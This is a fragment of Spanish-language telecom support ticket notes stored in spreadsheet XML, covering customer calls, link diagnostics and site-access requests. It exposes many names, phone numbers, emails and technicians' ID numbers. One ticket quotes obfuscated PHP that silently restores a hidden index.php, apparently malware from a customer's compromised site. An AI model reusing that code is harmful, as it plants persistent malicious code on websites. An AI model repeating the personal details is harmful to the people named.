SALUDOS.</t>
  </si>
  <si>
    <t>CLIENTE EDUARDO HERRERA SOLICITA SE LE MARQUE EN 10 MINUTOS AL 0050364264472, PARA COORDINAR LA VISITA TECNICA.
3001050960
COLA:
NOMBRE: A: 0050323124056
NÚMERO: 0050323124056
DURACIÓN: 0:00:35
ESTADO: CONECTADA
DETALLES: 0050323124056
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 09:43:50</t>
  </si>
  <si>
    <t>CLIENTE EDUARDO INDICA QUE SON APROXIMADAMENTE 3 DIAS PARA QUE AUTORICEN LOS ACCESOS, SE QUEDA A LA ESPERA.
3001114728
COLA:
NOMBRE: A: 0050364264472
NÚMERO: 0050364264472
DURACIÓN: 0:01:47
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050364264472
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 12:31:39</t>
  </si>
  <si>
    <t>SE ENVIA COREO AL CLIENTE CON LOS DATOS PARA TRAMITAR PERMISOS DE INGRESO
CASO: SD1134626 //23464200 / AEROMANTENIMIENTO, S.A
ESVIN ANTONIO PAREDES SAMUY
BUEN DÍA ESTIMADO CLIENTE, PARA REVISIÓN DEL E1
23464200
AEROMANTENIMIENTO, S.A
SE INGRESARAN LAS SIGUIENTES HERRAMIENTAS:
EQUIPO DE MEDICIÓN DE FIBRA OPTICA (OPM)
COMPUTADORA PORTÁTIL HP PROBOOK440
HERRAMIENTAS VARIAS (PINZAS, ALICATES, ETC)
ESCALERA
EL AUTOMÓVIL EN EL QUE LLEGARÁ EL TÉCNICO ES:
PICK UP MITSUBISHI 2021 P-915272
Y SE ENVÍA LISTADO DE TÉCNICOS QUE PODRÁN ATENDER LA FALLA, EL MAS CERCANO AL MOMENTO DE LA AUTORIZACIÓN DE LOS PERMISOS ESTARÁ LLEGANDO AL SITIO:
02085886-3 JESUS OPICO CASTILLO
00157708-4 ABRAHAM SAMUEL PEREZ
03547221-1 RONAL MOREL CRESPIN
04086716-7 GERARDO ANTONIO MINERO FERNANDEZ
02400310-1 EDGAR MAURICIO MONTOYA SANCHEZ
00580847-9 CARLOS EDUARDO GOMEZ ZELEDON
02878871-1 JOSE ALFREDO JIMENEZ
04086716-7 GERARDO ANTONIO MINERO FERNANDEZ
QUEDAMOS A LA ESPERA DE LA CONFIRMACIÓN DE LOS PERMISOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE EDUARDO HERRERA   23124056 EN DOS OCASIONES NO RESPONDE, SE QUIERE CONSULTAR ESTADO DE LOS PERMISOS PARA ACCESO AL AEROPUERTO. SE INTENTARÁ CONTACTAR LUEGO. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>F4599876</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANTONIO ALTUREZ 37046986 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001954128</t>
  </si>
  <si>
    <t>SE LLAMA ANTONIO PARA REALIZAR PRUEBAS DE PRIMER NIVEL SIN EMBARGO NO RESPONDE. ENVIA A BUZON---</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A ANTONIO ALTUREZ SIN EMBARGO ENVIA A BUZON---
37046986</t>
  </si>
  <si>
    <t>F4599895</t>
  </si>
  <si>
    <t>CLIENTE OMAR SALAS  INDICA QUE PERSONAL DE TELEFONICA LE QUITO LOS EQUIPO DESDE HACE TIEMPO Y EL NO RECUERDA LA FECHA EXACTO. PERO DESDE ESE MOMENTO QUEDO FUERA ESTE E1 Y DESEA QUE SE LE RESTABLEZCA YA QUE SI LO  ESTA FACTURANDO
2001921593
COLA:
NOMBRE: A: 41508892
NÚMERO: 41508892
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 41508892
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 13/06/2022 14:28:10</t>
  </si>
  <si>
    <t>CLIENTE OMAR SALAS INDICA QUE SE PUEDE REALIZAR VISITA DE 8 A 17 HORAS  EL DIA MIÉRCOLES 15/06 YA QUE HASTA ESE DIA ESTARÁ DE NUEVO EL EN SITIO, NO SE REQUIEREN PERMISOS DE INGRESO.
2001932885
COLA:
NOMBRE: A: 41508892
NÚMERO: 41508892
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: 41508892
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 13/06/2022 15:02:42</t>
  </si>
  <si>
    <t>F4599897</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MORAZAN 95715971 QUIEN SOLICITA LLAMADA PARA MAÑANA A LAS 16:00 HRS
-ID 2001942888</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MORAZAN AL 95715971 INDICA QUE TIENE MUCHA INTERMINTENCIA QUE NO PUEDE TRABAJAR ASI || SE NOTIFICA A  GESTOR **
-ID 2001879521
**</t>
  </si>
  <si>
    <t>F4599898</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANTONI GRANDE 78546034 - 78026488 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001033541</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ANTONI GRANDE 78546034 INDICA QUE NO ESTA EN SITIO, SOLICITA LLAMADA A LAS 13:30 HORAS
2001881391
COLA:
NOMBRE: A: 0050378546034
NÚMERO: 0050378546034
ESTADO: CONECTADA
DURACIÓN: 0:01:20
DETALLES: 0050378546034
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 13/06/2022 12:26:43</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ANTONI GRANDE 78546034 PERO NO CONTESTA Y ENVÍA A BUZÓN, SE DARÁ SEGUIMIENTO EL DÍA DE MAÑANA A LAS 9:00 AM
2001976970
COLA:
NOMBRE: A: 0050378546034
NÚMERO: 0050378546034
ESTADO: MARCANDO
DURACIÓN: 0:00:01
DETALLES: 0050378546034
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 13/06/2022 17:30:01
2001977085
COLA:
NOMBRE: A: 0050378546034
NÚMERO: 0050378546034
ESTADO: MARCANDO
DURACIÓN: 0:00:01
DETALLES: 0050378546034
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 13/06/2022 17:30:37</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANTONI GRANDE 78546034 - 78026488 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001957923 - 2001958082 - 2001958407</t>
  </si>
  <si>
    <t>F4599908</t>
  </si>
  <si>
    <t>E LLAMA AL CLIENTE LUDWIN FRANCO INDICA QUE NO PUEDEN SACAR LLAMADAS SOLO RECIBIR, AL INTENTAR HACER UNA LLAMADA SALIENTE SE CORTA, NO TIENE PROBLEMAS ENTRE EXTENSIONES.
2001915226
COLA:
NOMBRE: A: 0050379890847
NÚMERO: 0050379890847
DURACIÓN: 0:00:10
ESTADO: MARCANDO
DETALLES: 0050379890847
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 13/06/2022 14:08:05</t>
  </si>
  <si>
    <t>CLIENTE LUDWIN FRANCO SOLICITA VISITA PARA MAÑANA 14/06 A LAS 7 AM
RESULTADO: LLAMADA HECHA
NOMBRE: 0050379890847
NÚMERO: 0050379890847
INICIO: HOY, 15:10
FIN: HOY, 15:11
DURACIÓN: 1:08
ID DE LLAMADA: 2001935835</t>
  </si>
  <si>
    <t>F4599914</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE LUDWIN FRANCO INDICA QUE NO PUEDEN SACAR LLAMADAS SOLO RECIBIR, AL INTENTAR HACER UNA LLAMADA SALIENTE SE CORTA, NO TIENE PROBLEMAS ENTRE EXTENSIONES.
2001915226
COLA:
NOMBRE: A: 0050379890847
NÚMERO: 0050379890847
DURACIÓN: 0:00:10
ESTADO: MARCANDO
DETALLES: 0050379890847
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 13/06/2022 14:08:05</t>
  </si>
  <si>
    <t>F4599943</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JACKELYN TORRES 59274997 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001897193</t>
  </si>
  <si>
    <t>F4599951</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE CON PRUEBAS REALIZADAS Y NIVELES DE FO, A LA ESPERA DE RESPUESTA POR PARTE DE CLIENTE.
JURGEN RENE BOCH CAAL
BUENAS TARDES,
ESTIMADO CLIENTE, POR ESTE MEDIO ADJUNTO LAS PRUEBAS REALIZADAS CON RESPECTO AL ENLACE CON ID: 1732053OH DE  COOPERATIVA DE AHORRO Y CREDITO SONAGUERA LTDA - ACTUALMENTE OBSERVAMOS EL ENLACE ACTIVO A NIVEL DE PING, SIN PÉRDIDA DE PAQUETES HACIA LA IP WAN, TIEMPOS DE RESPUESTA CORRECTOS, Y NO SE OBSERVA ATENUACIÓN EN LA FIBRA ÓPTICA. NOS PODRÍA BRINDAR HACIA QUE DIRECCIONAMIENTO IP PRIGEN Y DESTINO TIENE PÉRDIDA DE PAQUETES. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
NIVELES DE FIBRA ÓPTICA
 *. TX OPTICAL POWER                        (-9.7 DBM)
 *. RX OPTICAL POWER                        (-11.4 DBM)
PRUEBAS DE PING HACIA LA WAN
PING -C 1000 -S 1500 -M 30 -B -VPN COOPERATIVA_SONAGUERA 10.1.247.146
  PING 10.1.247.146: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.1.247.146 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/3/41 MS
ESTADO DE LA INTERFAZ WAN
&lt;1732053_HW-AR617_COOPERATIVA-SONAGUERA_TEG54_DT20MB&gt;DISPLAY INTERFACE GIGABITETHERNET0/0/4
GIGABITETHERNET0/0/4 CURRENT STATE : UP
LINE PROTOCOL CURRENT STATE : DOWN
DESCRIPTION:HUAWEI, AR SERIES, GIGABITETHERNET0/0/4 INTERFACE
ROUTE PORT,THE MAXIMUM TRANSMIT UNIT IS 1500
INTERNET PROTOCOL PROCESSING : DISABLED
IP SENDING FRAMES' FORMAT IS PKTFMT_ETHNT_2, HARDWARE ADDRESS IS FC73-FB3A-4D4A
LAST PHYSICAL UP TIME   : 2022-04-29 18:18:56
LAST PHYSICAL DOWN TIME : 2022-04-29 18:18:29
CURRENT SYSTEM TIME: 2022-06-13 19:41:38
PORT MODE: AUTO FIBER
SPEED :  100,  LOOPBACK: NONE
DUPLEX: FULL,  NEGOTIATION: DISABLE
MDI   : -  CLOCK   : -
LAST 300 SECONDS INPUT RATE 17744 BITS/SEC, 9 PACKETS/SEC
LAST 300 SECONDS OUTPUT RATE 32672 BITS/SEC, 10 PACKETS/SEC
INPUT PEAK RATE 25495120 BITS/SEC,RECORD TIME: 2022-05-12 19:35:27
OUTPUT PEAK RATE 24778232 BITS/SEC,RECORD TIME: 2022-06-06 00:10:35
INPUT:  107275045 PACKETS, 53286253694 BYTES
  UNICAST:          107184612,  MULTICAST:                  43
  BROADCAST:            90148,  JUMBO:                       -
  DISCARD:                  0,  TOTAL ERROR:                 0
  CRC:                      0,  GIANTS:                      0
  JABBERS:                  0,  THROTTLES:                   0
  RUNTS:                    0,  SYMBOLS:                     0
  IGNOREDS:                 0,  FRAMES:                      0
OUTPUT:  110250304 PACKETS, 53297970107 BYTES
  UNICAST:          110250292,  MULTICAST:                   0
  BROADCAST:               12,  JUMBO:                       -
  DISCARD:                  0,  TOTAL ERROR:                 0
  COLLISIONS:               0,  EXCESSIVECOLLISIONS:         0
  LATE COLLISIONS:          0,  DEFERREDS:                   0
    INPUT BANDWIDTH UTILIZATION THRESHOLD : 100.00%
    OUTPUT BANDWIDTH UTILIZATION THRESHOLD: 100.00%
    INPUT BANDWIDTH UTILIZATION  : 0.02%
    OUTPUT BANDWIDTH UTILIZATION : 0.04%
EQUIPOS CONECTADOS.
&lt;1732053_HW-AR617_COOPERATIVA-SONAGUERA_TEG54_DT20MB&gt;DISPLAY ARP ALL
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                    VLAN/CEVLAN(SIP/DIP)      PVC
------------------------------------------------------------------------------
172.17.2.9      FC73-FB3A-4D49            I -         VLANIF1
172.17.2.10     C4AD-3410-9662  20        D-0         GE0/0/0
                                             1/-
10.81.36.18     FC73-FB3A-4D4A            I -         GE0/0/4.2144
10.81.36.1      084F-0AC8-6BAA  17        D-0         GE0/0/4.2144
                                          2144/-
10.1.247.146    FC73-FB3A-4D4A            I -         GE0/0/4.3025
10.1.247.145    084F-0AC8-6BAA  18        D-0         GE0/0/4.3025
                                          3025/-
------------------------------------------------------------------------------
TOTAL:6         DYNAMIC:3       STATIC:0     INTERFACE:3
.</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 8:09
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; JURGEN RENE BOCH CAAL &lt;JURGEN.BOCH@CLARO.COM.GT&gt;; CARLOS.MORAZAN@CAYCSOL.COOP.HN &lt;CARLOS.MORAZAN@CAYCSOL.COOP.HN&gt;; JUNIOR.MORALES@CAYCSOL.COOP.HN &lt;JUNIOR.MORALES@CAYCSOL.COOP.HN&gt;; EDUARDOMORAZAN@GMAIL.COM &lt;EDUARDOMORAZAN@GMAIL.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;
ASUNTO: RE: 1732053OH || TEGUCIGAPA || F4599951
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4599953</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE ROBERTO CRUZ 42162906, APOYRA UBICANDO SU PBX PARA REINICIARLA. ID:2001894290</t>
  </si>
  <si>
    <t>CLIENTE ROBERTO CRUZ 42162906 REINICIA EQUIPO ASMI52 Y SU PLANTA PBX PERO SERVICIO CONTINÚA SIN RECIBIR LLAMADAS
ID DE LLAMADA: 2001894290</t>
  </si>
  <si>
    <t>F4599967</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A FREDY ACEVEDO/CLIENTE; SE INFORMA ENLACE AFECTADO POR CORTE DE FO EN SECTOR, AVANCES EN DOS HORAS.</t>
  </si>
  <si>
    <t>F4599971</t>
  </si>
  <si>
    <t>**SE PROCEDE A ENVIAR CORREO A CLIENTE, A ESPERA DE RESPUESTA **
DE: VERONICA RAQUEL VASQUEZ CORTEZ &lt;VERONICAR.VASQUEZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 16:18
PARA: DIEGO MORA (VENDOR) &lt;LUIS.D.MORA@WALMART.COM&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;
ASUNTO: RV: ENLACE INESTABLE DE WALMART HEREDIA ESTE ID: CONTR0001962833OC</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001019437</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 CONTESTA EL SEÑOR JEFERSON VASQUEZ SOLICITA QUE SE LE ENVIE LA INFORMACION POR CORREO || SE NOTIFICA A GESTOR **
-ID 2001951757
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253  QUIEN SOLICITA LLAMADA NUEVAMENTE A LAS 15:00 HRS PARA VALIDAR EL FUNCIONAMIENTO
-ID 2001922398</t>
  </si>
  <si>
    <t>F4599986</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARNERY GONZALEZ /89204149 VALIDA SERVICIO AUTORIZA CIERRE DE TICKET
2001986170
COLA:
NOMBRE: A: 50589204149
NÚMERO: 50589204149
DURACIÓN: 0:01:15
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50589204149
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 13/06/2022 18:17:16</t>
  </si>
  <si>
    <t>F4600008</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE LUIS, INIDICA ESTADO LED DEL EQUIPO ASMI54L,  PWR =VERDE,  ALM =ROJO,  SYNC 1=ROJO. SE APLICAR REINICIO Y QUEDA EN EL MISMO ESTADO, POR LO QUE CONFIRMA LOS SIGUIENTES DATOS PARA VISITA.
HORARIO: 8 A 23 HORAS
DIRECCION: 4TA AVENIDA 5-47 ZONA 1 MALACATAN - SAN MARCOS 
CONTACTO EN SITIO: LUIS 77771661
PERMISOS: IDENTIFICACION
2001940162
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 7753
DURACIÓN: 0:13:16
ESTADO: ACD - ASIGNADO A: LUVY.SANDOVAL
DETALLES: 7753
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/06/2022 15:36:34</t>
  </si>
  <si>
    <t>F4600019</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CRISTIAN ROMERO 76837650 MENCIONA QUE YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA SEGUIMIENTO PARA MAÑANA A LAS 7:30 HRS
-ID 2001958752</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN ROMERO 76837650 - 26457125 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001931672 - 1001932132</t>
  </si>
  <si>
    <t>F4600022</t>
  </si>
  <si>
    <t>-* SE HABLA CON GERMAN OCHOA (CLIENTE) SE VALIDA QUE IPS YA NO APARECEN EN BLACKLIST, CONFIRMA QUE ACTUALMENTE ESTA UTILIZANDO LA IP 190.149.175.193, INFORMA QUE LE DA ERROR AL QUERER INGRESAR A SITIO WWW.PENKI.COM.GT, SE TRATA DE INGRESAR Y NO SE TIENE ACCESO DESDE NUESTRA RED, SE LE SOLICITA INFORMACION DE DONDE ESTA ALOJADO EL DOMINIO INFORMA QUE LO DESCONOCE PERO ESCALRA CON SU IT Y PROVEEDOR Y NOS DEVOLVERA LA LLAMADA -*
-* ERROR AL INGRESAR:
$I_P = "INDEX.PHP"; $INDEX = FILE_GET_CONTENTS($I_P); $PATH = "{INDEX_HIDE}"; IF (FILE_EXISTS($PATH)) { $INDEX_HIDE = FILE_GET_CONTENTS($PATH); $INDEX_HIDE = BASE64_DECODE(STR_ROT13(BASE64_DECODE(STR_ROT13($INDEX_HIDE)))); IF(MD5($INDEX) != MD5($INDEX_HIDE)) { @CHMOD($I_P, 0644); @FILE_PUT_CONTENTS($I_P, $INDEX_HIDE); @CHMOD($I_P, 0444); } }</t>
  </si>
  <si>
    <t>PERSONAL DE BO SEGURIDAD YA TRABAJA EN EL DESLIST DEL SEGMENTO LISTADO; ADICIONAL SE LLAMÓ/HABLÓ CON GERMAN OCHOA/CLIENTE 41232028 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>F4600042</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA.
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 14:50
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; ALFONSO LOPEZ OCANA &lt;ALFONSO.LOPEZO@ELEKTRA.COM.MX&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; ANA C. ORDONEZ MARTINEZ &lt;ANA.ORDONEZ@CLARO.COM.HN&gt;; FRANKLIN GERARDO BUESO BETANCOURTH &lt;FRANKLIN.BUESO@CLARO.COM.HN&gt;; ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;
CC: JESUS CUETO CISNEROS &lt;JCUETOC@ELEKTRA.COM.MX&gt;; MARCO ANTONIO HERNANDEZ RUEDA &lt;MAHERNANDEZ@BANCOAZTECA.COM.HN&gt;
ASUNTO: RE: SD 3452377 || 7623 - PAZ TELA || 9766 - TRUJILLO II || SIN SERVICIO
BUEN DÍA ESTIMADO CLIENTE.
CLIENTE:  OH1000568820/BANCO AZTECA -
ID:  1036954OH
DIRECCIÓN:  BANCO AZTECA   TELA
INCIDENTE: SD1134673
COMO PARTE DEL SEGUIMIENTO AL CASO, SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO, LLEGANDO SIN PÉRDIDA DE PAQUETES A LA IP WAN DE PUNTO REMOTO, SE DETERMINÓ EQUIPO INHIBIDO, LUEGO DE REINICIO, SE RESTABLECIÓ EL ENLACE SIN PÉRDIDAS.
PING INICIAL CON PÉRDIDAS
PING FINAL SIN PÉRDIDAS
QUEDAREMOS ATENTOS A SUS COMENTARIOS PARA PODER PROCEDER AL CIERRE DEL CASO YA QUE POR PARTE DE CLARO NO HAY ACCIONES QUE REALIZAR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4600049</t>
  </si>
  <si>
    <t>SE LLAMA A PR PERO LLAMADA NO COMPLETA
SE LLAMA A PERSONA QUIEN REPORTA INCIDENTE SIN EMBARGO OPERDORA INDICA QUE NUMERO NO SE ENCUENTRA OCUPADO--
30389449
&gt;&gt;&gt;&gt; SERVICIO A NIVEL DE CLARO SE ENCUENTRA ACTIVO.-</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE L ESTER KROLIK AL 30389449 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001941880
**</t>
  </si>
  <si>
    <t>F4600052</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE CARLOS GARRIDO QUIEN INDICA QUE EL SERVICIO ESTA INESTABLE.
2001919653
COLA:
NOMBRE: A: 53612105
NÚMERO: 011 50253612105
DURACIÓN: 0:02:46
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50253612105
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/06/2022 14:24:32</t>
  </si>
  <si>
    <t>F4600054</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LISANDRO JOSÉ QUESADA 2236-0100 EXT. 3 MENCIONA QUE ESTARA GESTIONANDO LOS PERMISOS Y CUANDO YA SE TENGAN AUTORIZADOS LOS PERMISOS ESTARA RESPONDIENDO POR CORREO
-ID 2001979369</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL  TÉCNICO QUE SE PRESENTARA EN SITIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 12:11
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; YOSELIN DAYRIELA MONTES MUNGUIA &lt;YOSELIN.MONTES@HN.ASESOREXTERNOCA.COM&gt;; ANGGIE MAELI FUENTES SOLORZANO &lt;ANGGIE.FUENTES@HN.ASESOREXTERNOCA.COM&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; LISANDRO JOSE QUESADA SANTOS &lt;LISANDRO.QUESADA@HN.ASESOREXTERNOCA.COM&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
CC: G-NOC HON &lt;NOC@BACCREDOMATIC.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
ASUNTO: RE: ENLACE DE DATOS AFECTADO-MERAKI AGENCIA PRINCIPAL SPS
BUEN DÍA ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITA OS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO.
DIRECCIÓN:  OFICINA PRINCIPAL SPS BAC CREDOMATIC AVE. CIRCUNVALACION
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
FRANCISCO JAVIER GARCIA HERNANDEZ            0507-1992-00060
INMER ROXANY YANEZ PEREZ                               1707-1988-00218
FRANCISCO JAVIER BANEGAS NIÑO                      0423-1994-00043
JANKEL DAMASIO KATTAN ABREGO                      0501-1985-09996
CHRISTIAN NOE RODRIGUEZ RODRIGUEZ            1618-1997-00716
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4600055</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROMAIN RIVERA 96667507 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001039039 - 3001039238</t>
  </si>
  <si>
    <t>F4600105</t>
  </si>
  <si>
